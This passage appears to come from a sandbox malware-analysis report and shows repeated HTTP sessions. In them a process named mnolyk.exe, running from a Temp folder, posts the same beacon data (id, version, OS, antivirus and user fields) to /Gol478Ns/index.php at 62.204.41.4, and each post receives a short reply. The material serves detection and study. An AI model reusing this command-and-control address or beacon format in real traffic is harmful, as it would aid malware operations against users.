                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.022794962 CET  648                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      534         192.168.2.7  50229        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:25.211608887 CET  649                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.275871992 CET  649                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      535         192.168.2.7  50230        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:25.448060989 CET  650                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.512218952 CET  650                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      536         192.168.2.7  50231        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:25.697760105 CET  651                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:25.781003952 CET  651                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      537         192.168.2.7  50232        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:25.965511084 CET  652                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:26.030555964 CET  652                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      538         192.168.2.7  50233        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:26.208390951 CET  653                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:26.273317099 CET  653                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      539         192.168.2.7  50234        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:26.686624050 CET  654                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:26.749392033 CET  654                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      54          192.168.2.7  49749        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:14.642908096 CET  169                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.706435919 CET  169                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      540         192.168.2.7  50235        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:27.132915020 CET  655                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:27.195987940 CET  655                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      541         192.168.2.7  50236        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:27.474416018 CET  656                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:27.538129091 CET  656                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      542         192.168.2.7  50237        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:28.175009012 CET  657                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:28.239854097 CET  657                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      543         192.168.2.7  50238        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:28.505872011 CET  658                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:28.570128918 CET  658                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      544         192.168.2.7  50239        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:29.333775997 CET  659                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:29.398273945 CET  659                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      545         192.168.2.7  50240        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:30.031559944 CET  660                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.096462965 CET  660                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      546         192.168.2.7  50241        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:30.345221996 CET  661                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.408487082 CET  661  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      547  192.168.2.7  50242  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:30.589447021 CET  662  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.653734922 CET  662  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      548  192.168.2.7  50243  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:30.844573975 CET  663  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.906086922 CET  663  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      549  192.168.2.7  50244  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:31.095484972 CET  664  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.160924911 CET  664  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      55  192.168.2.7  49750  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:14.882616997 CET  170  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.946597099 CET  170  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      550  192.168.2.7  50245  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:31.338382006 CET  665  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
